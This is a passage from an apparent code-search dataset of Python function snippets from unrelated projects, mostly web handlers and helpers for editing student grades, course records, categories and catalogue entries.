render(\n\t\trequest, \"editAttendance.html\", context_dict\n\t)", "def put(self, id=None):\n\n if not id:\n return {'msg':'Missing achievement id.'}, 400\n\n if not all(\n [request.form.get('roll_no'),\n request.form.get('name'),\n request.form.get('batch'),\n request.form.get('programme'),\n request.form.get('category'),]):\n \n return {'msg':'Field(s) missing.'}, 400\n\n try:\n ach = AcademicAchievement.query.get(id)\n\n if not ach:\n return {'msg':'Academic achievement not found'}, 404\n\n ach.roll_no = request.form.get('roll_no'),\n ach.name = request.form.get('name'),\n ach.batch = checkBatch(request.form.get('batch')),\n ach.programme = request.form.get('programme'),\n ach.category = request.form.get('category'),\n\n ach.save()\n data = ach.toDict()\n\n return {'data' : data}, 200\n\n except (ValueError, mongoalchemy.exceptions.BadValueException) as e:\n print(e)\n return {'msg':'Invalid form data.'}, 400\n\n except Exception as e:\n print(e)\n return {'msg':'Could not modify academic achievement.'}, 500", "def updateStudentProposalReferences(request):\n\n return updateReferencesForModel('student_proposal')", "def AddGrade(self, student, discipline, grade_value):\n if not self.__data['s'].HasKey(student.ID):\n raise NonExistentItemIDError(\"Student does not exist.\")\n if not self.__data['d'].HasKey(discipline.ID):\n raise NonExistentItemIDError(\"Discipline does not exist.\")\n self.__data['g'].AddItems([Grade(self.__data['g'].GetSafeKey(), student.ID, discipline.ID, grade_value)])\n self.__undo_list.append(['g'])\n self.__redo_list.clear()", "def update_attempt_with_grading(db, attempt_id, grading):\n attrs = {}\n if grading['is_solution']:\n attrs['is_unsolved'] = False\n if grading['is_full_solution']:\n attrs['is_fully_solved'] = True\n if len(attrs) > 0:\n db.update_row(db.tables.attempts, attempt_id, attrs)", "def editConcept(self):\n if self.concept_list.currentIndex().isValid():\n concept = self.concept_list.selectedItems()[0].data(Qt.UserRole)[0]\n subcategory = self.concept_list.selectedItems()[0].data(Qt.UserRole)[1]\n dlg = EditConceptDialog(self, concept, subcategory)\n if dlg.exec_():\n concept, subcategory = dlg.getValue()\n self.db.update_concept(concept)\n self.db.update_subcategory(subcategory)\n self.search()", "def save(self, *args, **kwargs):\n super(CurriculumGuideSection, self).save(*args, **kwargs)\n self.clean()", "def update_employee(employee):\n employee_id = get_employee_input_int(\"Enter the employee id you want to update\")\n newGrade = get_employee_input_int(\"Enter the new grade for \")\n db.update_employee(employee_id, newGrade)\n print(employee.full_name + \"'s grade value has been updated to :-> \", newGrade)", "def change_view(self, request, object_id, form_url='', extra_context=None):\n section = models.Section.objects.filter(pk=object_id)\\\n .prefetch_related(\"facility__experiment\",\n \"participants\")\\\n .first()\n exp_id = section.facility.experiment.id\n # create bulk forms\n bulk_add_change_frm = create_bulk_add_change_form(request, exp_id)\n bulk_del_frm = create_bulk_delete_form(request)\n # attach site id and bulk forms to 'extra_context'\n extra_context = extra_context or {}\n extra_context['section_id'] = object_id\n extra_context[\"bulk_add_change_form\"] = bulk_add_change_frm\n extra_context['bulk_delete_form'] = bulk_del_frm\n # print extra_context\n return super(SectionAdmin, self).change_view(\n request, object_id, form_url, extra_context=extra_context)", "def updateStudents(request):\n\n return updateRole('gsoc_student')", "def set_grade(\n self,\n assignment_id,\n student_id,\n grade_value,\n gradebook_id='',\n **kwargs\n ):\n # pylint: disable=too-many-arguments\n\n # numericGradeValue stringified because 'x' is a possible\n # value for excused grades.\n grade_info = {\n 'studentId': student_id,\n 'assignmentId': assignment_id,\n 'mode': 2,\n 'comment': 'from MITx {0}'.format(time.ctime(time.time())),\n 'numericGradeValue': str(grade_value),\n 'isGradeApproved': False\n }\n grade_info.update(kwargs)\n log.info(\n \"student %s set_grade=%s for assignment %s\",\n student_id,\n grade_value,\n assignment_id)\n return self.post(\n 'grades/{gradebookId}'.format(\n gradebookId=gradebook_id or self.gradebook_id\n ),\n data=grade_info,\n )", "def update(self, request, pk=None):\n current_user = User.objects.get(id=request.user.id)\n if current_user.is_staff:\n try:\n category = Category.objects.get(pk=pk)\n except Category.DoesNotExist:\n return Response({\"reason\": \"Doesn't Exist\"}, status=status.HTTP_400_BAD_REQUEST)\n category.label = request.data['label']\n category.approved = False\n try:\n category.save()\n return Response({}, status=status.HTTP_204_NO_CONTENT)\n except ValidationError as ex:\n return Response({\"reason\": ex.message}, status=status.HTTP_400_BAD_REQUEST)\n else:\n return Response({'message': \"*Sigh*, you're not changing a thing, non-admin\"},\n status=status.HTTP_403_FORBIDDEN)", "def edit_classifications(self, identifier_type, identifier):\n self.require_librarian(flask.request.library)\n\n work = self.load_work(flask.request.library,\n identifier_type, identifier)\n if isinstance(work, ProblemDetail):\n return work\n\n staff_data_source = DataSource.lookup(\n self._db, DataSource.LIBRARY_STAFF)\n\n # Previous staff classifications\n primary_identifier = work.presentation_edition.primary_identifier\n old_classifications = self._db \\\n .query(Classification) \\\n .join(Subject) \\\n .filter(\n Classification.identifier == primary_identifier,\n Classification.data_source == staff_data_source\n )\n old_genre_classifications = old_classifications \\\n .filter(Subject.genre_id != None)\n old_staff_genres = [\n c.subject.genre.name\n for c in old_genre_classifications\n if c.subject.genre\n ]\n old_computed_genres = [\n work_genre.genre.name\n for work_genre in work.work_genres\n ]\n\n # New genres should be compared to previously computed genres\n new_genres = flask.request.form.getlist(\"genres\")\n genres_changed = sorted(new_genres) != sorted(old_computed_genres)\n\n # Update audience\n new_audience = flask.request.form.get(\"audience\")\n if new_audience != work.audience:\n # Delete all previous staff audience classifications\n for c in old_classifications:\n if c.subject.type == Subject.FREEFORM_AUDIENCE:\n self._db.delete(c)\n\n # Create a new classification with a high weight\n primary_identifier.classify(\n data_source=staff_data_source,\n subject_type=Subject.FREEFORM_AUDIENCE,\n subject_identifier=new_audience,\n weight=WorkController.STAFF_WEIGHT,\n )\n\n # Update target age if present\n new_target_age_min = flask.request.form.get(\"target_age_min\")\n new_target_age_min = int(\n new_target_age_min) if new_target_age_min else None\n new_target_age_max = flask.request.form.get(\"target_age_max\")\n new_target_age_max = int(\n new_target_age_max) if new_target_age_max else None\n if new_target_age_max is not None and new_target_age_min is not None and \\\n new_target_age_max < new_target_age_min:\n return INVALID_EDIT.detailed(_(\"Minimum target age must be less than maximum target age.\"))\n\n if work.target_age:\n old_target_age_min = work.target_age.lower\n old_target_age_max = work.target_age.upper\n else:\n old_target_age_min = None\n old_target_age_max = None\n if new_target_age_min != old_target_age_min or new_target_age_max != old_target_age_max:\n # Delete all previous staff target age classifications\n for c in old_classifications:\n if c.subject.type == Subject.AGE_RANGE:\n self._db.delete(c)\n\n # Create a new classification with a high weight - higher than audience\n if new_target_age_min and new_target_age_max:\n age_range_identifier = \"%s-%s\" % (\n new_target_age_min, new_target_age_max)\n primary_identifier.classify(\n data_source=staff_data_source,\n subject_type=Subject.AGE_RANGE,\n subject_identifier=age_range_identifier,\n weight=WorkController.STAFF_WEIGHT * 100,\n )\n\n # Update fiction status\n # If fiction status hasn't changed but genres have changed,\n # we still want to ensure that there's a staff classification\n new_fiction = True if flask.request.form.get(\n \"fiction\") == \"fiction\" else False\n if new_fiction != work.fiction or genres_changed:\n # Delete previous staff fiction classifications\n for c in old_classifications:\n if c.subject.type == Subject.SIMPLIFIED_FICTION_STATUS:\n self._db.delete(c)\n\n # Create a new classification with a high weight (higher than genre)\n fiction_term = \"Fiction\" if new_fiction else \"Nonfiction\"\n classification = primary_identifier.classify(\n data_source=staff_data_source,\n subject_type=Subject.SIMPLIFIED_FICTION_STATUS,\n subject_identifier=fiction_term,\n weight=WorkController.STAFF_WEIGHT,\n )\n classification.subject.fiction = new_fiction\n\n # Update genres\n # make sure all new genres are legit\n for name in new_genres:\n genre, is_new = Genre.lookup(self._db, name)\n if not isinstance(genre, Genre):\n return GENRE_NOT_FOUND\n if genres[name].is_fiction is not None and genres[name].is_fiction != new_fiction:\n return INCOMPATIBLE_GENRE\n if name == \"Erotica\" and new_audience != \"Adults Only\":\n return EROTICA_FOR_ADULTS_ONLY\n\n if genres_changed:\n # delete existing staff classifications for genres that aren't being kept\n for c in old_genre_classifications:\n if c.subject.genre.name not in new_genres:\n self._db.delete(c)\n\n # add new staff classifications for new genres\n for genre in new_genres:\n if genre not in old_staff_genres:\n classification = primary_identifier.classify(\n data_source=staff_data_source,\n subject_type=Subject.SIMPLIFIED_GENRE,\n subject_identifier=genre,\n weight=WorkController.STAFF_WEIGHT\n )\n\n # add NONE genre classification if we aren't keeping any genres\n if len(new_genres) == 0:\n primary_identifier.classify(\n data_source=staff_data_source,\n subject_type=Subject.SIMPLIFIED_GENRE,\n subject_identifier=SimplifiedGenreClassifier.NONE,\n weight=WorkController.STAFF_WEIGHT\n )\n else:\n # otherwise delete existing NONE genre classification\n none_classifications = self._db \\\n .query(Classification) \\\n .join(Subject) \\\n .filter(\n Classification.identifier == primary_identifier,\n Subject.identifier == SimplifiedGenreClassifier.NONE\n ) \\\n .all()\n for c in none_classifications:\n self._db.delete(c)\n\n # Update presentation\n policy = PresentationCalculationPolicy(\n classify=True,\n regenerate_opds_entries=True,\n regenerate_marc_record=True,\n update_search_index=True\n )\n work.calculate_presentation(policy=policy)\n\n return Response(\"\", 200)", "def test_superuser_edit_assessment(self):\n req, resp = data.get_assessment(self.contract['id'])\n\n response = self.superuser.put(self.assessment_report_url, req)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n response = self.superuser.patch(self.assessment_report_url, req)\n self.assertEqual(response.status_code, status.HTTP_200_OK)", "def detail_assignmentype(request, pk):\n prof = request.user.prof\n context = {'prof': prof}\n assignmentype = Assignmentype.objects.filter(pk=pk, prof=prof).first()\n assignments = assignmentype.assignment_set.\\\n annotate(std=StdDev('evalassignment__grade_assignment'),\n mean=Avg('evalassignment__grade_assignment'))\n if assignmentype:\n context['assignmentype'] = assignmentype\n context['assignments'] = assignments\n context['range_grades'] = range(assignmentype.nb_grading)\n return render(request, 'gradapp/detail_assignmentype.html',\n context)\n else:\n return redirect('gradapp:list_assignmentypes_running')", "def test_update_category(self):\n self.update_success(self.test_data['pants'], self.test_data['shirts'])", "def add_grade(self, student, grade):\n try:\n self.grades[student.id].append(grade)\n except KeyError:\n raise ValueError('Student not in Grade Book.')", "def update_course_index(self, updated_index_entry):\r\n self.db_connection.update_course_index(updated_index_entry)", "def update_experience(uid, rid, increment):\n errmsg = []\n\n experience = Experience.query.filter(Experience.uid == uid).filter(Experience.rid == rid).first()\n if not experience:\n errmsg.append(\"Experience entry does not exist for the given user ID and restaurant ID.\")\n elif increment < 0:\n errmsg.append(\"Experience cannot be incremented by a negative number.\")\n\n if not errmsg:\n old_level = convert_experience_to_level(experience.experience)\n milestone = get_milestone(uid, rid)\n Experience.query.filter(Experience.uid == uid).filter(Experience.rid == rid).update(dict(experience=experience.experience + increment))\n db.session.commit()\n if milestone:\n new_level = convert_experience_to_level(experience.experience)\n if old_level < new_level and new_level == int(milestone[\"level\"]):\n update_points(uid, rid, milestone[\"reward\"])\n return None\n\n return errmsg", "def coeff_assignmentype(request, pk):\n prof = request.user.prof\n context = {'prof': prof}\n assignmentype = Assignmentype.objects.filter(pk=pk, prof=prof).first()\n if assignmentype:\n nb_questions = assignmentype.nb_questions\n if request.method == 'POST':\n form = CoeffForm(request.POST,\n nb_questions=nb_questions)\n if form.is_valid():\n assignmentype.questions_coeff = [form.cleaned_data['coeff_%s'\n % i] for i\n in range(1, assignmentype.\n nb_questions + 1)]\n assignmentype.save()\n # Compute all grades\n log = tasks.compute_grades_assignmentype(assignmentype.id)\n logger.error(log)\n return redirect('/detail_assignmentype/%s/' % pk)\n else:\n questions_coeff = assignmentype.questions_coeff\n coeff = {}\n if questions_coeff:\n for i in range(1, nb_questions + 1):\n coeff['coeff_%s' % i] = assignmentype.questions_coeff[i - 1]\n else:\n coeff = dict.fromkeys(['coeff_%s' % i\n for i in range(1, nb_questions + 1)],\n None)\n form = CoeffForm(nb_questions=nb_questions,\n initial=coeff)\n context['form'] = form\n context['assignmentype'] = assignmentype\n return render(request, 'gradapp/coeff_assignmentype.html',\n context)\n return redirect('gradapp:list_assignmentypes_running')", "def update_course_info(self, grades_file_info):\n grades_file = os.path.join(self.path, \"grades.txt\")\n sep, header = grades_file_info\n try:\n for info in file_reading_gen(grades_file, 4, sep, header):\n # StudentID | Course | Grade | InstructorID\n student_id = info[0]\n course_code = info[1]\n grade = info[2]\n instructor_id = info[3]\n\n if student_id not in self.students:\n raise KeyError(\"Student with student id {} does not exists in students.txt\".format(student_id))\n if instructor_id not in self.instructors:\n raise KeyError(\"Instructor with instructor id {} does not exists in instructors.txt\".format(instructor_id))\n\n student = self.students[student_id]\n instructor = self.instructors[instructor_id]\n\n student.courses_completed.add(course_code)\n student.grades[course_code] = grade\n\n instructor.courses_taught.add(course_code)\n instructor.student_count[course_code] += 1\n except ValueError:\n raise ValueError(\"Invalid data in grades.txt\")\n except FileNotFoundError as e:\n print('Missing grades.txt.\\n' + str(e))", "def edit(self):\n\n pass", "def editProfile():\n form = EditProfileForm(request.form)\n if request.method == \"GET\":\n return render_template(\"/pages/editprofile.html\", form=form)\n else:\n choose = True\n section = form.category.data\n return redirect(url_for(\"editProfileSection\", section=section))", "def edit_recipe(request, **kwargs):\n template = 'recipe/add-edit-vary.html'\n pk = kwargs.get('pk')\n recipe = Recipe.objects.get(pk=pk)\n if request.method == 'POST':\n recipe_form = RecipeForm(request.POST, request.FILES, instance=recipe)\n formset = RecipeIngredientRelationshipFormSet(request.POST,\n prefix='ingredient_form')\n if formset.is_valid() and recipe_form.is_valid():\n recipe_form.save()\n for ingredient in formset.cleaned_data:\n if ingredient:\n if ingredient['id']:\n relationship = RecipeIngredientRelationship.objects.get(id=ingredient['id'].id)\n relationship.quantity = ingredient['quantity']\n relationship.ingredient = ingredient['ingredient']\n relationship.save()\n else:\n new = RecipeIngredientRelationship(recipe=recipe,\n quantity=ingredient['quantity'],\n ingredient=ingredient['ingredient'])\n new.save()\n return HttpResponseRedirect('/')\n else:\n recipe_form = RecipeForm(instance=recipe)\n formset = RecipeIngredientRelationshipFormSet(queryset=recipe.ingredients_in_recipe.all(), prefix='ingredient_form')\n return render(request, template, {'formset': formset,\n 'recipe_form': recipe_form,\n 'page_title': 'Edit Recipe'})", "def save_course(self):\r\n self.course.save()\r\n self.store.update_item(self.course, self.user.id)", "def edit_entry():\n if not check_admin_logged() :\n abort(403)\n\n title = request.form['title']\n category = request.form['category']\n buydate = request.form['buydate']\n ssid = decrypt_book_record(request.form['ssid'])\n\n if not check_items_in_form(title, category, buydate):\n return redirect(url_for('show_entries_admin'))\n\n edited_entry = Entries.query.filter_by(\n id=ssid, title=title, category=category, \\\n buydate=buydate).first()\n\n if edited_entry is not None :\n edited_entry.introduction = request.form['introduction']\n if db.session.is_modified(edited_entry) :\n # commit only if something is modified\n try :\n db.session.commit()\n except IntegrityError as e :\n log_error('error when edit:')\n log_error(e.message)\n flash(u'数据库操作失败导致更新失败!请看后台日志')\n flash(u'成功更新条目')\n\n return redirect(url_for('show_entries_admin'))", "def careerCatagory_edit(request):\r\n action = tool.get_param_by_request(request.GET, 'action', \"add\", str)\r\n page_index = tool.get_param_by_request(request.GET, 'page_index', 1, int)\r\n\r\n careerCatagory = None\r\n if action == \"edit\" or action == \"show\":\r\n _id = tool.get_param_by_request(request.GET, 'id', 0, int)\r\n careerCatagory = api_careerCatagory.get_career_catagory_by_id(_id)\r\n\r\n if careerCatagory.is_error():\r\n return render_to_response(\"404.html\", {}, context_instance=RequestContext(request))\r\n\r\n careerCatagory = careerCatagory.result()[0]\r\n\r\n c = {\"careerCatagory\": careerCatagory, \"action\": action, \"page_index\": page_index}\r\n\r\n return render_to_response(\"mz_course/careerCatagory_save.html\", c, context_instance=RequestContext(request))", "def updateStudentProjectReferences(request):\n\n return updateReferencesForModel('student_project')", "def edit_student(request, s_id):\n user = CustomUser.objects.get(id=s_id)\n student = Student.objects.get(user_id=s_id)\n\n if request.method == 'POST':\n user_edit_form = EditUserForm(request.POST, instance=user)\n student_edit_form = EditStudentForm(request.POST, instance=student)\n\n if user_edit_form.is_valid() and student_edit_form.is_valid():\n user_edit_form.save()\n student_edit_form.save()\n messages.success(request, \"The student's account has been edited successfully\")\n return redirect('student_account', s_id=s_id)\n else:\n messages.error(request, \"The form has not been filled correctly\")\n\n else:\n user_edit_form = EditUserForm(instance=user)\n student_edit_form = EditStudentForm(instance=student)\n\n context = {\n 'user_edit_form': user_edit_form,\n 'student_edit_form': student_edit_form\n }\n return render(request, 'main/edit_student.html', {'user_edit_form': context['user_edit_form'],\n 'student_edit_form': context['student_edit_form']})", "def put(self, request, pk, format=None):\n settings.LOGGER.info(\n \"JobCatalogDetailViewList >> PUT >> requset:{}, pk: {}\".format(\n request.query_params, pk))\n\n try:\n program_id = request.META.get('HTTP_X_SVMS_PROGRAM_ID')\n if not program_id:\n settings.LOGGER.info(\n \"JobCatalogDetailViewList >> PUT >> pk: {}, error:{} \".format(\n pk, \"Program Id not found\"))\n return Response(\n {\"error\": \"Program Id not found\"},\n status=status.HTTP_400_BAD_REQUEST\n )\n if 'category' in request.data and 'job_title' in request.data[\n 'category']:\n job_title_data = request.data['category']['job_title']\n for data in job_title_data:\n job_title_data_list = {}\n for each_data in data:\n if each_data in EDITABLE_FIELDS:\n job_title_data_list.update(\n {each_data: data[each_data]}\n )\n job_title_obj = JobTitleDetailView.get_object(\n self, data['id'])\n\n if job_title_obj.program_id != program_id:\n settings.LOGGER.info(\n \"JobCatalogDetailViewList >> PUT >> pk: {}, error:{} \".format(\n pk, \"Not authorized to edit\"))\n return Response(\n {\"error\": \"Not authorized to edit\"},\n status=status.HTTP_400_BAD_REQUEST\n )\n serializer = JobTitleSerializer(\n instance=job_title_obj, data=job_title_data_list,\n partial=True)\n if serializer.is_valid():\n serializer.save()\n else:\n settings.LOGGER.info(\n \"JobCatalogDetailViewList >> PUT >> pk: {}, error:{} \".format(\n pk,\n \"Only Job Level, Description and Job Tag is editable\"))\n return Response(\n {\n \"error\": \"Only Job Level, Description and Job Tag is editable\"},\n status=status.HTTP_400_BAD_REQUEST\n )\n catalog_obj = self.get_object(pk)\n serializer = JobCatalogSerializer(catalog_obj)\n settings.LOGGER.info(\n \"JobCatalogDetailViewList >> PUT >> pk: {}, Response:{} \".format(\n pk, serializer.data))\n\n return Response(\n serializer.data,\n status=status.HTTP_200_OK\n )\n except Exception as e:\n settings.LOGGER.info(\n \"JobCatalogDetailViewList >> PUT >> pk: {}, error:{} \".format(\n pk, e))\n return Response({\"error\": \"{}\".format(e)},\n status=status.HTTP_400_BAD_REQUEST)", "def editItem(category_item_id):\n editedItem = db.findItem(id=category_item_id)\n if editedItem.user_id != login_session['user_id']:\n return not_authorized()\n if request.method == 'POST':\n db.updateItem(editedItem, request.form)\n return redirect(url_for('showCatalog'))\n return render_template(\n 'edit_item.html', categories=db.getAllCategories(), item=editedItem)", "def update_category(data, key):\n try:\n category = Categories.objects.get(pk=key, is_delete=False)\n except ObjectDoesNotExist:\n return Response({'status': CATEGORY_NOT_FOUND}, status=status.HTTP_404_NOT_FOUND)\n\n valid_fields = ['period_number', 'period_name', 'terms']\n correct_details = True\n for field in data:\n if field in valid_fields:\n setattr(category, field, data[field])\n else:\n correct_details = False\n break\n\n if correct_details:\n category.save()\n return Response({'status': CATEGORY_UPDATED}, status=status.HTTP_200_OK)\n return Response({'status': INVALID_FIELDS}, status=status.HTTP_400_BAD_REQUEST)", "def item_update(request):\n if request.method == 'POST':\n item_to_update = get_object_or_404(StockItem, pk=request.POST['id'])\n item_to_update.name = request.POST['name']\n item_to_update.count = int(request.POST['count'])\n item_to_update.date_of_expiration = request.POST['exp']\n item_to_update.fk_category = Category.objects.get(name=request.POST['cat'])\n item_to_update.fk_subcategory = SubCategory.objects.get(name=request.POST['subcat'])\n item_to_update.notes = request.POST['notes']\n item_to_update.save()\n return HttpResponse(status=200)", "def this_is_the_grade(self, grade_to_set):\n\n\t\tcmds.intField(self.grade_intField, edit = True, value = grade_to_set['grade_value'])\n\t\tself.update_subcategory('intField')\n\t\tif grade_to_set['grade_value'] is not '':\n\t\t\tcmds.scrollField(self.comments_text_field, edit = True, text = grade_to_set['comment_text'])\n\t\t\tself.update_subcategory('comments_text')\n\t\tif grade_to_set['default_comments_text'] is not '':\t\n\t\t\tcmds.scrollField(self.default_comments, edit = True, text = grade_to_set['default_comments_text'])\n\t\t\tself.update_subcategory('default_comments_text')\n\t\tif grade_to_set['example_comments_text'] is not '':\n\t\t\tcmds.scrollField(self.example_comments, edit = True, text = grade_to_set['example_comments_text'])\n\t\t\tself.update_subcategory('example_comments_text')\n\n\t\tself.auto_flagged_list = grade_to_set.get('examples', [])\n\t\tself.log('auto_flagged_list updated: \\n{}'.format(self.auto_flagged_list))", "def __ui_update_student(self):\n student_id = input(\"student id: \")\n student_name = input(\"student discipline_name: \")\n disciplines_list = []\n\n discipline_name = None\n while discipline_name != '':\n discipline_name = input(\"Discipline discipline_name: \")\n if discipline_name == '':\n break\n elif self.__discipline_controller.find_by_name(discipline_name) is not None:\n disciplines_list.append(discipline_name)\n print(\"Add discipline successful\\n\")\n else:\n print(\"Invalid discipline!\")\n\n try:\n self.__student_controller.update_student(student_id, student_name, disciplines_list)\n print(\"Update student successful\\n\")\n except StudentException as se:\n print(se)\n return\n except RepositoryException as re:\n print(re)\n return", "def grade(student, request, course, keep_raw_scores=False):\r\n with manual_transaction():\r\n return _grade(student, request, course, keep_raw_scores)", "def update_shift(self, shift_id, pro, mid, beginner):\n try:\n self.db_handler.update_shift_by_id(shift_id, pro, mid, beginner)\n self.logger.write_to_log('shift updated', 'model')\n except Exception as err:\n method_name = sys._getframe().f_code.co_name\n\n self.logger.write_to_log('exception', 'model')\n self.logger.write_to_err_log(f'exception in method {method_name} - {err}', 'model')", "def test_update_entry_courses(self):\r\n # This method utilises the PUT request method and will make changes to the Canvas instance. This needs consideration.\r\n pass", "def give_extra_credit(grades,netids,bonus):\n # No accumulator. This is a procedure\n \n for student in netids:\n if student in grades: # Test if student is a key in grades\n grades[student] = grades[student]+bonus", "def put(self, request, pk):\n return self.update(request, pk)", "def update_decision(request, sub_id):\n submission = get_object_or_404(Submission, id=sub_id)\n validate_chair_access(request.user, submission.conference)\n stage, _ = ReviewStage.objects.get_or_create(\n submission=submission,\n num_reviews_required=(\n submission.stype.num_reviews if submission.stype else 0),\n locked=False)\n decision = stage.decision\n form = UpdateReviewDecisionForm(request.POST, instance=decision)\n if form.is_valid():\n form.save()\n return JsonResponse(status=200, data={})\n return JsonResponse(status=500, data={'errors': form.errors})", "def _add_grade_to_row(self, component, score):\r\n component_index = self.components.setdefault(component, len(self.components))\r\n self._current_row[component_index] = score", "def put(self):\n request = transforms.loads(self.request.get('request'))\n key = self.request.get('key')\n\n if not self.assert_xsrf_token_or_fail(\n request, 'update-course-category', {'key': key}):\n return\n\n if not roles.Roles.is_super_admin():\n transforms.send_json_response(\n self, 401, 'Access denied.', {'key': self.KEY})\n return\n\n payload = request.get('payload')\n updated_dict = transforms.json_to_dict(\n transforms.loads(payload), self.get_schema_dict())\n\n errors = []\n self.apply_updates(updated_dict, errors)\n if not errors:\n transforms.send_json_response(self, 200, 'Saved.')\n else:\n transforms.send_json_response(self, 412, '\\n'.join(errors))", "def modify_access(request, course_id):\r\n course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)\r\n course = get_course_with_access(\r\n request.user, 'instructor', course_id, depth=None\r\n )\r\n try:\r\n user = get_student_from_identifier(request.GET.get('unique_student_identifier'))\r\n except User.DoesNotExist:\r\n response_payload = {\r\n 'unique_student_identifier': request.GET.get('unique_student_identifier'),\r\n 'userDoesNotExist': True,\r\n }\r\n return JsonResponse(response_payload)\r\n\r\n # Check that user is active, because add_users\r\n # in common/djangoapps/student/roles.py fails\r\n # silently when we try to add an inactive user.\r\n if not user.is_active:\r\n response_payload = {\r\n 'unique_student_identifier': user.username,\r\n 'inactiveUser': True,\r\n }\r\n return JsonResponse(response_payload)\r\n\r\n rolename = request.GET.get('rolename')\r\n action = request.GET.get('action')\r\n\r\n if not rolename in ['instructor', 'staff', 'beta']:\r\n return HttpResponseBadRequest(strip_tags(\r\n \"unknown rolename '{}'\".format(rolename)\r\n ))\r\n\r\n # disallow instructors from removing their own instructor access.\r\n if rolename == 'instructor' and user == request.user and action != 'allow':\r\n response_payload = {\r\n 'unique_student_identifier': user.username,\r\n 'rolename': rolename,\r\n 'action': action,\r\n 'removingSelfAsInstructor': True,\r\n }\r\n return JsonResponse(response_payload)\r\n\r\n if action == 'allow':\r\n allow_access(course, user, rolename)\r\n elif action == 'revoke':\r\n revoke_access(course, user, rolename)\r\n else:\r\n return HttpResponseBadRequest(strip_tags(\r\n \"unrecognized action '{}'\".format(action)\r\n ))\r\n\r\n response_payload = {\r\n 'unique_student_identifier': user.username,\r\n 'rolename': rolename,\r\n 'action': action,\r\n 'success': 'yes',\r\n }\r\n return JsonResponse(response_payload)", "def insert_grade(grade, form, rc):\n dbname = form[\"dbname\"]\n collname = \"grades\"\n try:\n coll = rc.client[dbname][collname]\n except (KeyError, AttributeError):\n abort(404)\n try:\n added = rc.client.insert_one(dbname, collname, grade)\n except Exception:\n traceback.print_exc()\n raise", "def update(self, request, *args, **kwargs):\n response = super(CategoryViewSet).update(self, request, *args, *kwargs)\n response.data['message'] = \"Categoria ha sido editada\"", "def update_search_parameters(self, selected_gender, selected_category, selected_subcategory):\r\n self.model.set_gender(selected_gender)\r\n self.model.set_category(selected_category)\r\n self.model.set_subcategory(selected_subcategory)\r\n self.model.fetch_results()", "def update_enrollment(context: dict) -> dict:\n enrollment = (\n session.query(Enrollment)\n .filter_by(\n subject_code=context[\"subject_code\"],\n student_ra=context[\"student_ra\"],\n year=context[\"year\"],\n semester=context[\"semester\"],\n )\n .first()\n )\n\n if enrollment:\n for attr in context.keys():\n setattr(enrollment, attr, context[attr])\n\n enrollment.save()\n\n return enrollment.asdict()", "def staff_form(request, pk, step=0):\n ts = get_timeslot()\n if not hasattr(ts, 'resultoptions'):\n raise PermissionDenied(\"Results menu is not yet visible.\")\n else:\n if not get_timeslot().resultoptions.Visible:\n raise PermissionDenied(\"Results menu is not yet visible.\")\n dstr = get_object_or_404(Distribution, pk=pk)\n if not hasattr(dstr, 'presentationtimeslot'):\n raise PermissionDenied('This student does not have a presentation planned. Please plan it first.')\n if not request.user.is_superuser and \\\n request.user != dstr.Proposal.Track.Head and \\\n request.user != dstr.Proposal.ResponsibleStaff and \\\n (get_grouptype('1') not in request.user.groups.all() or request.user not in dstr.Proposal.Assistants.all()) and \\\n get_grouptype('3') not in request.user.groups.all() and \\\n request.user not in dstr.presentationtimeslot.Presentations.Assessors.all():\n raise PermissionDenied(\"You are not the correct owner of this distribution. \"\n \"Only track heads and responsible staff can edit grades.\")\n\n cats = GradeCategory.objects.filter(TimeSlot=get_timeslot()).distinct()\n numcategories = len(cats)\n step = int(step)\n if step == 0:\n return render(request, \"results/wizard.html\", {\n \"step\": 0,\n \"pk\": pk,\n \"categories\": cats,\n \"dstr\": dstr,\n \"final\": all(f.Final is True for f in dstr.results.all()) if dstr.results.all() else False, # fix for all([])=True\n # \"files\": files,\n })\n elif step <= numcategories:\n saved = False\n cat = cats[step - 1]\n try: # existing category result\n cat_result = CategoryResult.objects.get(Distribution=dstr, Category=cat)\n initial = None\n except CategoryResult.DoesNotExist: # new result\n cat_result = CategoryResult(Distribution=dstr, Category=cat)\n # initial = {'Files': list(StudentFile.objects.filter(Type=cat_result.Category.File, Distribution=cat_result.Distribution).distinct())}\n if request.method == \"POST\": # submitted form\n if cat_result.Final:\n return render(request, \"base.html\", context={\n \"Message\": \"Category Result has already been finalized! Editing is not allowed anymore. \"\n \"If this has to be changed, contact support staff\"\n })\n # if files:\n # category_form = CategoryResultFormFile(request.POST, instance=cat_result, prefix='catform')\n # else:\n category_form = CategoryResultForm(request.POST, instance=cat_result, prefix='catform')\n aspect_forms = []\n for i, aspect in enumerate(cat.aspects.all()):\n try: # try find existing form\n aspect_result = CategoryAspectResult.objects.get(CategoryResult=cat_result, CategoryAspect=aspect)\n except CategoryAspectResult.DoesNotExist: # new clean form\n aspect_result = CategoryAspectResult(CategoryResult=cat_result, CategoryAspect=aspect)\n aspect_forms.append({\n \"form\": AspectResultForm(request.POST, instance=aspect_result, prefix=\"aspect\" + str(i)),\n \"aspect\": aspect,\n })\n if category_form.is_valid() and all([form['form'].is_valid() for form in aspect_forms]):\n cat_result = category_form.save()\n # return the form with the cleaned grade, not the one with the (uncleaned) post data:\n # if files:\n # category_form = CategoryResultFormFile(instance=cat_result, prefix='catform')\n # else:\n category_form = CategoryResultForm(instance=cat_result, prefix='catform')\n for form in aspect_forms: # these forms do not need to be updated as aspect data is not cleaned.\n aspect_result = form['form'].instance\n aspect_result.CategoryResult = cat_result\n aspect_result.save()\n saved = True\n else:\n # if files:\n # category_form = CategoryResultFormFile(instance=cat_result, initial=initial, prefix='catform', disabled=cat_result.Final)\n # else:\n category_form = CategoryResultForm(instance=cat_result, prefix='catform', disabled=cat_result.Final)\n aspect_forms = []\n for i, aspect in enumerate(cat.aspects.all()):\n try:\n aspect_result = CategoryAspectResult.objects.get(CategoryResult=cat_result, CategoryAspect=aspect)\n except CategoryAspectResult.DoesNotExist:\n aspect_result = CategoryAspectResult(CategoryResult=cat_result, CategoryAspect=aspect)\n aspect_forms.append({\n \"form\": AspectResultForm(instance=aspect_result, prefix=\"aspect\" + str(i), disabled=cat_result.Final),\n \"aspect\": aspect,\n })\n return render(request, \"results/wizard.html\", {\n \"step\": step,\n \"categories\": cats,\n \"category\": cat,\n \"categoryform\": category_form,\n \"aspectsforms\": aspect_forms,\n \"dstr\": dstr,\n \"pk\": pk,\n \"saved\": saved,\n \"final\": cat_result.Final,\n \"aspectlabels\": CategoryAspectResult.ResultOptions,\n # \"files\": files,\n 